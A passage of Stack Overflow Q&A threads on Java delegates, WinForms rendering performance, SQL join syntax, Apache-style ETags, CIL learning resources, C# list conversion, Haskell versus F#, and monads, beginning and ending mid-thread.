Callable<String> callable = knockKnockDelegator.delegateTo(testInstance);
assertThat(callable.call(), is("who's there?"));
}
The nice thing about this idiom is that you can verify that the delegated-to method exists, and has the required signature, at the point where you create the delegator (although not at compile-time, unfortunately, although a FindBugs plug-in might help here), then use it safely to delegate to various instances.
See the karg code on github for more tests and implementation.
A: Short story: no.
Introduction
The newest version of the Microsoft Visual J++ development environment
supports a language construct called delegates or bound method
references. This construct, and the new keywords delegate and
multicast introduced to support it, are not a part of the JavaTM
programming language, which is specified by the Java Language
Specification and amended by the Inner Classes Specification included
in the documentation for the JDKTM 1.1 software.
It is unlikely that the Java programming language will ever include
this construct. Sun already carefully considered adopting it in 1996,
to the extent of building and discarding working prototypes. Our
conclusion was that bound method references are unnecessary and
detrimental to the language. This decision was made in consultation
with Borland International, who had previous experience with bound
method references in Delphi Object Pascal.
We believe bound method references are unnecessary because another
design alternative, inner classes, provides equal or superior
functionality. In particular, inner classes fully support the
requirements of user-interface event handling, and have been used to
implement a user-interface API at least as comprehensive as the
Windows Foundation Classes.
We believe bound method references are harmful because they detract
from the simplicity of the Java programming language and the
pervasively object-oriented character of the APIs. Bound method
references also introduce irregularity into the language syntax and
scoping rules. Finally, they dilute the investment in VM technologies
because VMs are required to handle additional and disparate types of
references and method linkage efficiently.
A: Have you read this :
Delegates are a useful construct in event-based systems. Essentially
Delegates are objects that encode a method dispatch on a specified
object. This document shows how java inner classes provide a more
generic solution to such problems.
What is a Delegate? Really it is very similar to a pointer to member
function as used in C++. But a delegate contains the target object
alongwith the method to be invoked. Ideally it would be nice to be
able to say:
obj.registerHandler(ano.methodOne);
..and that the method methodOne would be called on ano when some specific event was received.
This is what the Delegate structure achieves.
Java Inner Classes
It has been argued that Java provides this
functionality via anonymous inner classes and thus does not need the additional
Delegate construct.
obj.registerHandler(new Handler() {
public void handleIt(Event ev) {
methodOne(ev);
}
} );
At first glance this seems correct but at the same time a nuisance.
Because for many event processing examples the simplicity of the
Delegates syntax is very attractive.
General Handler
However, if event-based programming is used in a more
pervasive manner, say, for example, as a part of a general
asynchronous programming environment, there is more at stake.
In such a general situation, it is not sufficient to include only the
target method and target object instance. In general there may be
other parameters required, that are determined within the context when
the event handler is registered.
In this more general situation, the java approach can provide a very
elegant solution, particularly when combined with use of final
variables:
void processState(final T1 p1, final T2 dispatch) {
final int a1 = someCalculation();
m_obj.registerHandler(new Handler() {
public void handleIt(Event ev) {
dispatch.methodOne(a1, ev, p1);
}
} );
}
final * final * final
Got your attention?
Note that the final variables are accessible from within the anonymous
class method definitions. Be sure to study this code carefully to
understand the ramifications. This is potentially a very powerful
technique. For example, it can be used to good effect when registering
handlers in MiniDOM and in more general situations.
By contrast, the Delegate construct does not provide a solution for
this more general requirement, and as such should be rejected as an
idiom on which designs can be based.
A: I have implemented callback/delegate support in Java using reflection. Details and working source are available on my website.
How It Works
There is a principle class named Callback with a nested class named WithParms. The API which needs the callback will take a Callback object as a parameter and, if neccessary, create a Callback.WithParms as a method variable. Since a great many of the applications of this object will be recursive, this works very cleanly.
With performance still a high priority to me, I didn't want to be required to create a throwaway object array to hold the parameters for every invocation - after all in a large data structure there could be thousands of elements, and in a message processing scenario we could end up processing thousands of data structures a second.
In order to be threadsafe the parameter array needs to exist uniquely for each invocation of the API method, and for efficiency the same one should be used for every invocation of the callback; I needed a second object which would be cheap to create in order to bind the callback with a parameter array for invocation. But, in some scenarios, the invoker would already have a the parameter array for other reasons. For these two reasons, the parameter array does not belong in the Callback object. Also the choice of invocation (passing the parameters as an array or as individual objects) belongs in the hands of the API using the callback enabling it to use whichever invocation is best suited to its inner workings.
The WithParms nested class, then, is optional and serves two purposes, it contains the parameter object array needed for the callback invocations, and it provides 10 overloaded invoke() methods (with from 1 to 10 parameters) which load the parameter array and then invoke the callback target.
What follows is an example using a callback to process the files in a directory tree. This is an initial validation pass which just counts the files to process and ensure none exceed a predetermined maximum size. In this case we just create the callback inline with the API invocation. However, we reflect the target method out as a static value so that the reflection is not done every time.
static private final Method COUNT =Callback.getMethod(Xxx.class,"callback_count",true,File.class,File.class);
...
IoUtil.processDirectory(root,new Callback(this,COUNT),selector);
...
private void callback_count(File dir, File fil) {
if(fil!=null) { // file is null for processing a directory
fileTotal++;
if(fil.length()>fileSizeLimit) {
throw new Abort("Failed","File size exceeds maximum of "+TextUtil.formatNumber(fileSizeLimit)+" bytes: "+fil);
}
}
progress("Counting",dir,fileTotal);
}
IoUtil.processDirectory():
/**
* Process a directory using callbacks. To interrupt, the callback must throw an (unchecked) exception.
* Subdirectories are processed only if the selector is null or selects the directories, and are done
* after the files in any given directory. When the callback is invoked for a directory, the file
* argument is null;
* <p>
* The callback signature is:
* <pre> void callback(File dir, File ent);</pre>
* <p>
* @return The number of files processed.
*/
static public int processDirectory(File dir, Callback cbk, FileSelector sel) {
return _processDirectory(dir,new Callback.WithParms(cbk,2),sel);
}
static private int _processDirectory(File dir, Callback.WithParms cbk, FileSelector sel) {
int cnt=0;
if(!dir.isDirectory()) {
if(sel==null || sel.accept(dir)) { cbk.invoke(dir.getParent(),dir); cnt++; }
}
else {
cbk.invoke(dir,(Object[])null);
File[] lst=(sel==null ? dir.listFiles() : dir.listFiles(sel));
if(lst!=null) {
for(int xa=0; xa<lst.length; xa++) {
File ent=lst[xa];
if(!ent.isDirectory()) {
cbk.invoke(dir,ent);
lst[xa]=null;
cnt++;
}
}
for(int xa=0; xa<lst.length; xa++) {
File ent=lst[xa];
if(ent!=null) { cnt+=_processDirectory(ent,cbk,sel); }
}
}
}
return cnt;
}
This example illustrates the beauty of this approach - the application specific logic is abstracted into the callback, and the drudgery of recursively walking a directory tree is tucked nicely away in a completely reusable static utility method. And we don't have to repeatedly pay the price of defining and implementing an interface for every new use. Of course, the argument for an interface is that it is far more explicit about what to implement (it's enforced, not simply documented) - but in practice I have not found it to be a problem to get the callback definition right.
Defining and implementing an interface is not really so bad (unless you're distributing applets, as I am, where avoiding creating extra classes actually matters), but where this really shines is when you have multiple callbacks in a single class. Not only is being forced to push them each into a separate inner class added overhead in the deployed application, but it's downright tedious to program and all that boiler-plate code is really just "noise".
A: Yes & No, but delegate pattern in Java could be thought of this way. This video tutorial is about data exchange between activity - fragments, and it has great essence of delegate sorta pattern using interfaces.
A: It doesn't have an explicit delegate keyword as C#, but you can achieve similar in Java 8 by using a functional interface (i.e. any interface with exactly one method) and lambda:
private interface SingleFunc {
void printMe();
}
public static void main(String[] args) {
SingleFunc sf = () -> {
System.out.println("Hello, I am a simple single func.");
};
SingleFunc sfComplex = () -> {
System.out.println("Hello, I am a COMPLEX single func.");
};
delegate(sf);
delegate(sfComplex);
}
private static void delegate(SingleFunc f) {
f.printMe();
}
Every new object of type SingleFunc must implement printMe(), so it is safe to pass it to another method (e.g. delegate(SingleFunc)) to call the printMe() method.
A: Not really, no.
You may be able to achieve the same effect by using reflection to get Method objects you can then invoke, and the other way is to create an interface with a single 'invoke' or 'execute' method, and then instantiate them to call the method your interested in (i.e. using an anonymous inner class).
You might also find this article interesting / useful : A Java Programmer Looks at C# Delegates (@blueskyprojects.com)
A: I know this post is old, but Java 8 has added lambdas, and the concept of a functional interface, which is any interface with only one method. Together these offer similar functionality to C# delegates. See here for more info, or just google Java Lambdas.
http://cr.openjdk.java.net/~briangoetz/lambda/lambda-state-final.html
A: While it is nowhere nearly as clean, but you could implement something like C# delegates using a Java Proxy.
A: No, but it has similar behavior, internally.
In C# delegates are used to creates a separate entry point and they work much like a function pointer.
In java there is no thing as function pointer (on a upper look) but internally Java needs to do the same thing in order to achieve these objectives.
For example, creating threads in Java requires a class extending Thread or implementing Runnable, because a class object variable can be used a memory location pointer.
A: No, Java doesn't have that amazing feature. But you could create it manually using the observer pattern. Here is an example:
Write C# delegate in java
A: The code described offers many of the advantages of C# delegates. Methods, either static or dynamic, can be treated in a uniform manner. The complexity in calling methods through reflection is reduced and the code is reusable, in the sense of requiring no additional classes in the user code. Note we are calling an alternate convenience version of invoke, where a method with one parameter can be called without creating an object array.Java code below:
class Class1 {
public void show(String s) { System.out.println(s); }
}
class Class2 {
public void display(String s) { System.out.println(s); }
}
// allows static method as well
class Class3 {
public static void staticDisplay(String s) { System.out.println(s); }
}
public class TestDelegate {
public static final Class[] OUTPUT_ARGS = { String.class };
public final Delegator DO_SHOW = new Delegator(OUTPUT_ARGS,Void.TYPE);
public void main(String[] args) {
Delegate[] items = new Delegate[3];
items[0] = DO_SHOW .build(new Class1(),"show,);
items[1] = DO_SHOW.build (new Class2(),"display");
items[2] = DO_SHOW.build(Class3.class, "staticDisplay");
for(int i = 0; i < items.length; i++) {
items[i].invoke("Hello World");
}
}
}
A: Java doesn't have delegates and is proud of it :). From what I read here I found in essence 2 ways to fake delegates:
1. reflection;
2. inner class
Reflections are slooooow! Inner class does not cover the simplest use-case: sort function. Do not want to go into details, but the solution with inner class basically is to create a wrapper class for an array of integers to be sorted in ascending order and an class for an array of integers to be sorted in descending order.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44912",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "222"
} |
Q: Windows Forms Application Performance My app has many controls on its surface, and more are added dynamically at runtime.
Although i am using tabs to limit the number of controls shown, and double-buffering too, it still flickers and stutters when it has to redraw (resize, maximize, etc).
What are your tips and tricks to improve WinForms app performance?
A: I know of two things you can do but they don't always apply to all situations.
*
*You're going to get better performance if you're using absolute positioning for each control (myNewlyCreatedButton.Location.X/Y) as opposed to using a flow layout panel or a table layout panel. WinForms has to do a lot less math trying to figure out where controls should be placed.
*If there is a single operation in which you're adding/removing/modifying a lot of controls, call "SuspendLayout()" on the container of the affected controls (whether it is a panel or the whole form), and when you're done with your work call "ResumeLayout()" on the same panel. If you don't, the form will have to do a layout pass each and every time you add/remove/modify a control, which cost a lot more time. see: http://msdn.microsoft.com/en-us/library/system.windows.forms.control.suspendlayout(VS.80).aspx
Although, I'm not sure how these approaches could apply when resizing a window.
A: Although more general than some of the other tips, here is mine:
When using a large number of "items", try to avoid creating a control for each one of them, rather reuse the controls. For example if you have 10 000 items, each corresponding to a button, it is very easy to (programatically) create a 10 000 buttons and wire up their event handlers, such that when you enter in the event handler, you know exactly which element you must work on. However it is much more efficient if you create, lets say, 500 buttons (because you know that only 500 buttons will be visible on the screen at any one time) and introduce a "mapping layer" between the buttons and the items, which dynamically reassigns the buttons to different items every time the user does something which would result in changing the set of buttons which should be visible (like moving a scrollbar for example).
A:
Although, I'm not sure how these approaches could apply when resizing a window.
Handle the ResizeBegin and ResizeEnd events to call SuspendLayout() and ResumeLayout(). These events are only on the System.Windows.Form class (although I wish they were also on Control).
A: Are you making good use of SuspendLayout() and ResumeLayout()?
http://msdn.microsoft.com/en-us/library/system.windows.forms.control.suspendlayout(VS.80).aspx
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44914",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: Explicit vs implicit SQL joins Is there any efficiency difference in an explicit vs implicit inner join?
For example:
SELECT * FROM
table a INNER JOIN table b
ON a.id = b.id;
vs.
SELECT a.*, b.*
FROM table a, table b
WHERE a.id = b.id;
A: On MySQL 5.1.51, both queries have identical execution plans:
mysql> explain select * from table1 a inner join table2 b on a.pid = b.pid;
+----+-------------+-------+------+---------------+------+---------+--------------+------+-------+
| id | select_type | table | type | possible_keys | key | key_len | ref | rows | Extra |
+----+-------------+-------+------+---------------+------+---------+--------------+------+-------+
| 1 | SIMPLE | b | ALL | PRIMARY | NULL | NULL | NULL | 986 | |
| 1 | SIMPLE | a | ref | pid | pid | 4 | schema.b.pid | 70 | |
+----+-------------+-------+------+---------------+------+---------+--------------+------+-------+
2 rows in set (0.02 sec)
mysql> explain select * from table1 a, table2 b where a.pid = b.pid;
+----+-------------+-------+------+---------------+------+---------+--------------+------+-------+
| id | select_type | table | type | possible_keys | key | key_len | ref | rows | Extra |
+----+-------------+-------+------+---------------+------+---------+--------------+------+-------+
| 1 | SIMPLE | b | ALL | PRIMARY | NULL | NULL | NULL | 986 | |
| 1 | SIMPLE | a | ref | pid | pid | 4 | schema.b.pid | 70 | |
+----+-------------+-------+------+---------------+------+---------+--------------+------+-------+
2 rows in set (0.00 sec)
table1 has 166208 rows; table2 has about 1000 rows.
This is a very simple case; it doesn't by any means prove that the query optimizer wouldn't get confused and generate different plans in a more complicated case.
A: @lomaxx: Just to clarify, I'm pretty certain that both above syntax are supported by SQL Serv 2005. The syntax below is NOT supported however
select a.*, b.*
from table a, table b
where a.id *= b.id;
Specifically, the outer join (*=) is not supported.
A:
Performance wise, they are exactly the same (at least in SQL Server) but be aware that they are deprecating this join syntax and it's not supported by sql server2005 out of the box.
I think you are thinking of the deprecated *= and =* operators vs. "outer join".
I have just now tested the two formats given, and they work properly on a SQL Server 2008 database. In my case they yielded identical execution plans, but I couldn't confidently say that this would always be true.
A: The second syntax has the unwanted possibility of a cross join: you can add tables to the FROM part without corresponding WHERE clause. This is considered harmful.
A: On some databases (notably Oracle) the order of the joins can make a huge difference to query performance (if there are more than two tables). On one application, we had literally two orders of magnitude difference in some cases. Using the inner join syntax gives you control over this - if you use the right hints syntax.
You didn't specify which database you're using, but probability suggests SQL Server or MySQL where there it makes no real difference.
A: As Leigh Caldwell has stated, the query optimizer can produce different query plans based on what functionally looks like the same SQL statement. For further reading on this, have a look at the following two blog postings:-
One posting from the Oracle Optimizer Team
Another posting from the "Structured Data" blog
I hope you find this interesting.
A: Basically, the difference between the two is that one is written in the old way, while the other is written in the modern way. Personally, I prefer the modern script using the inner, left, outer, right definitions because they are more explanatory and makes the code more readable.
When dealing with inner joins there is no real difference in readability neither, however, it may get complicated when dealing with left and right joins as in the older method you would get something like this:
SELECT *
FROM table a, table b
WHERE a.id = b.id (+);
The above is the old way how a left join is written as opposed to the following:
SELECT *
FROM table a
LEFT JOIN table b ON a.id = b.id;
As you can visually see, the modern way of how the script is written makes the query more readable. (By the way same goes for right joins and a little more complicated for outer joins).
Going back to the boiler plate, it doesn't make a difference to the SQL compiler how the query is written as it handles them in the same way. I've seen a mix of both in Oracle databases which have had many people writing into it, both elder and younger ones. Again, it boils down to how readable the script is and the team you are developing with.
A: The first answer you gave uses what is known as ANSI join syntax, the other is valid and will work in any relational database.
I agree with grom that you should use ANSI join syntax. As they said, the main reason is for clarity. Rather than having a where clause with lots of predicates, some of which join tables and others restricting the rows returned with the ANSI join syntax you are making it blindingly clear which conditions are being used to join your tables and which are being used to restrict the results.
A: Performance-wise, they are exactly the same (at least in SQL Server).
PS: Be aware that the "implicit OUTER JOIN" syntax--using *= or =* in a WHERE after using comma--is deprecated since SQL Server 2005. (The "implicit (CROSS) JOIN" syntax using comma as used in the question is still supported.)
Deprecation of "Old Style" JOIN Syntax: Only A Partial Thing
A: Personally I prefer the join syntax as its makes it clearer that the tables are joined and how they are joined. Try compare larger SQL queries where you selecting from 8 different tables and you have lots of filtering in the where. By using join syntax you separate out the parts where the tables are joined, to the part where you are filtering the rows.
A: Performance wise, it should not make any difference. The explicit join syntax seems cleaner to me as it clearly defines relationships between tables in the from clause and does not clutter up the where clause.
A: In my experience, using the cross-join-with-a-where-clause syntax often produces a brain damaged execution plan, especially if you are using a Microsoft SQL product. The way that SQL Server attempts to estimate table row counts, for instance, is savagely horrible. Using the inner join syntax gives you some control over how the query is executed. So from a practical point of view, given the atavistic nature of current database technology, you have to go with the inner join.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44917",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "477"
} |
Q: How do you make an etag that matches Apache? I want to make an etag that matches what Apache produces. How does apache create it's etags?
A: One thing to remember about Apache's Etags is that they don't play well in clusters because they include inode information that can—and probably will—vary between machines in the same cluster.
A: Apache uses the standard format of inode-filesize-mtime. The only caveat to this is that the mtime must be epoch time and padded with zeros so it is 16 digits. Here is how to do it in PHP:
$fs = stat($file);
header("Etag: ".sprintf('"%x-%x-%s"', $fs['ino'], $fs['size'],base_convert(str_pad($fs['mtime'],16,"0"),10,16)));
A: If you're dynamically generating your page though, this probably won't make sense. If you're in PHP, you can pick the inode and file size of the main script, but the modify time won't tell you if your data has changed. Unless you have a good caching process or just generate static pages, etags aren't helpful. If you do have a good caching process, the inode and file size are probably irrelevant.
Edit: For people who don't know what etags are - they're just supposed to be a value that changes when the content has changed, for caching purposes. The browser gets the etag from the web server, compares it to the etag for its cached copy and then fetches the whole page if the etag has changed.
A: the answer above (from Chris) works well, but can be simplified using an implicit cast in the sprintf:
sprintf('"%x-%x-%x"', $s['ino'], $s['size'], str_pad($s['mtime'], 16, "0"));
The suggested %016x doesn't work because the padding is applied after the conversion to hex, rather than before.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44937",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "13"
} |
Q: Learning CIL Does anybody know any good resources for learning how to program CIL with in-depth descriptions of commands, etc.? I have looked around but not found anything particularly good.
A: Expert .NET 2.0 IL Assembler rocks because the author writes well and includes every freaking detail you can imagine. It doesn't hurt that he wrote the IL assembler, disassembler and validator. Best of all you can buy it in a PDF instead of a dead tree.
Masochists interested in compiler development will also enjoy Compiling for the .NET Common Language Runtime by John Gough. I found this book immensely helpful during a virtual machine development project where I "stole" lots of ideas from the CLR design.
A: The only CIL book on my shelf is Expert .NET 2.0 IL Assembler by Serge Lidin. In terms of what the individual opcodes do or mean, the Microsoft documentation on System.Reflection.Emit has some pretty good information. And it's always useful to look at existing IL with Reflector.
Edit: CIL (and indeed the CLR in general) has not changed at all between .NET 2.0 and .NET 3.5 -- the underlying runtime is basically the same, modulo fixes and performance improvements. So there's nothing newer available on a CIL level than what would be in a book on 2.0
A: Expert .NET 2.0 IL Assembler by Serge Lidin
There was a 1.1 version of the same book, but I haven't seen anything for the latest .NET release. It's an excellent book. I used it to write an OCR component in MSIL, as a learning project.
[Edit] @Curt is right, 3.0 and 3.5 are just extensions to 2.0, I hadn't plugged that in to my head yet. Now I've thought of a fun geek project... compare the disassembly of standard 2.0 code to the new LINQ/Lambda way of performing common tasks like filtering lists. For some reason I assumed that the magic was happening in new IL features, not just the compiler.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44940",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "9"
} |
Q: Cast List to List in .NET 2.0 Can you cast a List<int> to List<string> somehow?
I know I could loop through and .ToString() the thing, but a cast would be awesome.
I'm in C# 2.0 (so no LINQ).
A: Is C# 2.0 able to do List<T>.Convert? If so, I think your best guess would be to use that with a delegate:
List<int> list = new List<int>();
list.Add(1);
list.Add(2);
list.Add(3);
list.Convert(delegate (int i) { return i.ToString(); });
Something along those lines.
Glenn's answer is probably the correct code ;-)
A: You can use:
List<int> items = new List<int>(new int[] { 1,2,3 } );
List<string> s = (from i in items select i.ToString()).ToList();
A: You wouldn't be able to directly cast it as no explicit or implicit cast exists from int to string, it would have to be a method involving .ToString() such as:-
foreach (int i in intList) stringList.Add(i.ToString());
Edit - or as others have pointed out rather brilliantly, use intList.ConvertAll(delegate(int i) { return i.ToString(); });, however clearly you still have to use .ToString() and it's a conversion rather than a cast.
A: result = listOfInt.Select(i => i.ToString(CultureInfo.InvariantCulture)).ToList()
replace the parameters result and listOfInt to your parameters
A: Converting from int List to string List can be done in two adittional ways besides the usual ToString(). Choose the one that pleases you more.
var stringlist = intlist.Select(x=>""+x).ToList();
Or also:
var stringlist = intlist.Select(x=>$"{x}").ToList();
And finally the traditional:
var stringlist = intlist.Select(x=>x.ToString()).ToList();
A: .NET 2.0 has the ConvertAll method where you can pass in a converter function:
List<int> l1 = new List<int>(new int[] { 1, 2, 3 } );
List<string> l2 = l1.ConvertAll<string>(delegate(int i) { return i.ToString(); });
A: Updated for 2010
List<int> l1 = new List<int>(new int[] { 1,2,3 } );
List<string> l2 = l1.ConvertAll<string>(x => x.ToString());
A: You have to build a new list. The underlying bit representations of List<int> and List<string> are completely incompatible -- on a 64-bit platform, for instance, the individual members aren't even the same size.
It is theoretically possible to treat a List<string> as a List<object> -- this gets you into the exciting worlds of covariance and contravariance, and is not currently supported by C# or VB.NET.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44942",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "101"
} |
Q: What are the primary differences between Haskell and F#? I've searched on the Internet for comparisons between F# and Haskell but haven't found anything really definitive. What are the primary differences and why would I want to choose one over the other?
A: Big differences:
*
*Platform
*Object orientation
*Laziness
The similarities are more important than the differences. Basically, you should use F# if you are on .NET already, Haskell otherwise. Also, OO and laziness mean that F# is closer to what you (probably) already know, so it is probably easier to learn.
Platform : Haskell has its own runtime, F# uses .NET. I don't know what the performance difference is, although I suspect the average code is about the same before optimisation. F# has the advantage if you need the .NET libraries.
Object orientation : F# has OO, and is very careful to make sure that .NET classes are easy to use even if your code isn't OO. Haskell has type classes which let you do something like OO, in a weird sort of way. They are like Ruby mixins crossed with Common Lisp generic functions. They're a little like Java/C# interfaces.
Laziness : Haskell is lazy, F# is not. Laziness enables some nice tricks and makes some things that look slow actually execute fast. But I find it a lot harder to guess how fast my code will run. Both languages let you use the other model, you just have to be explicit about it in your code.
Minor differences:
*
*Syntax : Haskell has slightly nicer syntax in my opinion. It's a little more terse and regular, and I like declaring types on a separate line. YMMV.
*Tools : F# has excellent Visual Studio integration, if you like that sort of thing. Haskell also has an older Visual Studio plugin, but I don't think it ever got out of beta. Haskell has a simple emacs mode, and you can probably use OCaml's tuareg-mode to edit F#.
*Side effects : Both languages make it pretty obvious when you are mutating variables. But Haskell's compiler also forces you to mark side effects whenever you use them. The practical difference is that you have to be a lot more aware of when you use libraries with side effects as well.
A: F# is part of the ML family of languages and is very close to OCaml. You may want to read this discussion on the differences between Haskell and OCaml.
A: A major difference, which is probably a result ofthe purity but I less see mentioned, is the pervasive use of monads. As is frequently pointed out, monads can be built in most any language, but life changes greatly when they are used pervasively throughout the libraries, and you use them yourself.
Monads provide something seen in a much more limited way in other languages: abstraction of flow control. They're incredibly useful and elegant ways of doing all sorts of things, and a year of Haskell has entirely changed the way I program, in the same way that moving from imperative to OO programming many years ago changed it, or, much later, using higher-order functions did.
Unfortunately, there's no way in a space like this to provide enough understanding to let you see what the difference is. In fact, no amount of writing will do it; you simply have to spend enough time learning and writing code to gain a real understanding.
As well, F# sometimes may become slightly less functional or more awkward (from the functional programming point of view) when you interface with the .NET platform/libraries, as the libraries were obviously designed from an OO point of view.
So you might consider your decision this way: are you looking to try out one of these languages in order to get a quick, relatively small increment of improvement, or are you willing to put in more time and get less immediate benefit for something bigger in the long term. (Or, at least, if you don't get something bigger, the easy ability to switch to the other quickly?) If the former, F# is your choice, if the latter, Haskell.
A couple of other unrelated points:
Haskell has slightly nicer syntax, which is no suprise, since the designers of Haskell knew ML quite well. However, F#'s 'light' syntax goes a long way toward improving ML syntax, so there's not a huge gap there.
In terms of platforms, F# is of course .NET; how well that will work on Mono I don't know. GHC compiles to machine code with its own runtime, working well under both Windows and Unix, which compares to .NET in the same way, that, say, C++ does. This can be an advantage in some circumstances, especially in terms of speed and lower-level machine access. (I had no problem writing a DDE server in Haskell/GHC, for example; I don't think you could do that in any .NET language, and regardless, MS certainly doesn't want you doing that.)
A: Well, for one I'd say a main advantage is that F# compiles against the .NET platform which makes it easy to deploy on windows. I've seen examples which explained using F# combined with ASP.NET to build web applications ;-)
On the other hand, Haskell has been around for waaaaay longer, so I think the group of people who are real experts on that language is a lot bigger.
For F# I've only seen one real implementation so far, which is the Singularity proof of concept OS. I've seen more real world implementations of Haskell.
A: Haskell is a "pure" functional language, where as F# has aspects of both imperative/OO and functional languages. Haskell also has lazy evaluation, which is fairly rare amongst functional languages.
What do these things mean? A pure functional language, means there are no side effects (or changes in shared state, when a function is called) which means that you are guaranteed that if you call f(x), nothing else happens besides returning a value from the function, such as console output, database output, changes to global or static variables.. and although Haskell can have non pure functions (through monads), it must be 'explicitly' implied through declaration.
Pure functional languages and 'No side effect' programming has gained popularity recently as it lends itself well to multi core concurrency, as it is much harder to get wrong with no shared state, rather than myriad locks & semaphores.
Lazy evaluation is where a function is NOT evaluated until it is absolutely necessary required. meaning that many operation can be avoided when not necessary. Think of this in a basic C# if clause such as this:
if(IsSomethingTrue() && AnotherThingTrue())
{
do something;
}
If IsSomethingTrue() is false then AnotherThingTrue() method is never evaluated.
While Haskell is an amazing language, the major benefit of F# (for the time being), is that it sits on top of the CLR. This lends it self to polyglot programming. One day, you may write your web UI in ASP.net MVC, your business logic in C#, your core algorithms in F# and your unit tests in Ironruby.... All amongst the the .Net framework.
Listen to the Software Engineering radio with Simon Peyton Jones for more info on Haskell: Episode 108: Simon Peyton Jones on Functional Programming and Haskell
| {
"language": "en",
"url": "https://stackoverflow.com/questions/44961",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "135"
} |
Q: What is a monad? Having briefly looked at Haskell recently, what would be a brief, succinct, practical explanation as to what a monad essentially is?
I have found most explanations I've come across to be fairly inaccessible and lacking in practical detail.
A: I've been thinking of Monads in a different way, lately. I've been thinking of them as abstracting out execution order in a mathematical way, which makes new kinds of polymorphism possible.
If you're using an imperative language, and you write some expressions in order, the code ALWAYS runs exactly in that order.
And in the simple case, when you use a monad, it feels the same -- you define a list of expressions that happen in order. Except that, depending on which monad you use, your code might run in order (like in IO monad), in parallel over several items at once (like in the List monad), it might halt partway through (like in the Maybe monad), it might pause partway through to be resumed later (like in a Resumption monad), it might rewind and start from the beginning (like in a Transaction monad), or it might rewind partway to try other options (like in a Logic monad).
And because monads are polymorphic, it's possible to run the same code in different monads, depending on your needs.
Plus, in some cases, it's possible to combine monads together (with monad transformers) to get multiple features at the same time.
A: tl;dr
{-# LANGUAGE InstanceSigs #-}
newtype Id t = Id t
instance Monad Id where
return :: t -> Id t
return = Id
(=<<) :: (a -> Id b) -> Id a -> Id b
f =<< (Id x) = f x
Prologue
The application operator $ of functions
forall a b. a -> b
is canonically defined
($) :: (a -> b) -> a -> b
f $ x = f x
infixr 0 $
in terms of Haskell-primitive function application f x (infixl 10).
Composition . is defined in terms of $ as
(.) :: (b -> c) -> (a -> b) -> (a -> c)
f . g = \ x -> f $ g x
infixr 9 .
and satisfies the equivalences forall f g h.
f . id = f :: c -> d Right identity
id . g = g :: b -> c Left identity
(f . g) . h = f . (g . h) :: a -> d Associativity
. is associative, and id is its right and left identity.
The Kleisli triple
In programming, a monad is a functor type constructor with an instance of the monad type class. There are several equivalent variants of definition and implementation, each carrying slightly different intuitions about the monad abstraction.
A functor is a type constructor f of kind * -> * with an instance of the functor type class.
{-# LANGUAGE KindSignatures #-}
class Functor (f :: * -> *) where
map :: (a -> b) -> (f a -> f b)
In addition to following statically enforced type protocol, instances of the functor type class must obey the algebraic functor laws forall f g.
map id = id :: f t -> f t Identity
map f . map g = map (f . g) :: f a -> f c Composition / short cut fusion
Functor computations have the type
forall f t. Functor f => f t
A computation c r consists in results r within context c.
Unary monadic functions or Kleisli arrows have the type
forall m a b. Functor m => a -> m b
Kleisi arrows are functions that take one argument a and return a monadic computation m b.
Monads are canonically defined in terms of the Kleisli triple forall m. Functor m =>
(m, return, (=<<))
implemented as the type class
class Functor m => Monad m where
return :: t -> m t
(=<<) :: (a -> m b) -> m a -> m b
infixr 1 =<<
The Kleisli identity return is a Kleisli arrow that promotes a value t into monadic context m. Extension or Kleisli application =<< applies a Kleisli arrow a -> m b to results of a computation m a.
Kleisli composition <=< is defined in terms of extension as
(<=<) :: Monad m => (b -> m c) -> (a -> m b) -> (a -> m c)
f <=< g = \ x -> f =<< g x
infixr 1 <=<
<=< composes two Kleisli arrows, applying the left arrow to results of the right arrow’s application.
Instances of the monad type class must obey the monad laws, most elegantly stated in terms of Kleisli composition: forall f g h.
f <=< return = f :: c -> m d Right identity
return <=< g = g :: b -> m c Left identity
(f <=< g) <=< h = f <=< (g <=< h) :: a -> m d Associativity
<=< is associative, and return is its right and left identity.
Identity
The identity type
type Id t = t
is the identity function on types
Id :: * -> *
Interpreted as a functor,
return :: t -> Id t
= id :: t -> t
(=<<) :: (a -> Id b) -> Id a -> Id b
= ($) :: (a -> b) -> a -> b
(<=<) :: (b -> Id c) -> (a -> Id b) -> (a -> Id c)
= (.) :: (b -> c) -> (a -> b) -> (a -> c)
In canonical Haskell, the identity monad is defined
newtype Id t = Id t
instance Functor Id where
map :: (a -> b) -> Id a -> Id b
map f (Id x) = Id (f x)
instance Monad Id where
return :: t -> Id t
return = Id
(=<<) :: (a -> Id b) -> Id a -> Id b
f =<< (Id x) = f x
Option
An option type
data Maybe t = Nothing | Just t
encodes computation Maybe t that not necessarily yields a result t, computation that may “fail”. The option monad is defined
instance Functor Maybe where
map :: (a -> b) -> (Maybe a -> Maybe b)
map f (Just x) = Just (f x)
map _ Nothing = Nothing
instance Monad Maybe where
return :: t -> Maybe t
return = Just
(=<<) :: (a -> Maybe b) -> Maybe a -> Maybe b
f =<< (Just x) = f x
_ =<< Nothing = Nothing
a -> Maybe b is applied to a result only if Maybe a yields a result.
newtype Nat = Nat Int
The natural numbers can be encoded as those integers greater than or equal to zero.
toNat :: Int -> Maybe Nat
toNat i | i >= 0 = Just (Nat i)
| otherwise = Nothing
The natural numbers are not closed under subtraction.
(-?) :: Nat -> Nat -> Maybe Nat
(Nat n) -? (Nat m) = toNat (n - m)
infixl 6 -?
The option monad covers a basic form of exception handling.
(-? 20) <=< toNat :: Int -> Maybe Nat
List
The list monad, over the list type
data [] t = [] | t : [t]
infixr 5 :
and its additive monoid operation “append”
(++) :: [t] -> [t] -> [t]
(x : xs) ++ ys = x : xs ++ ys
[] ++ ys = ys
infixr 5 ++
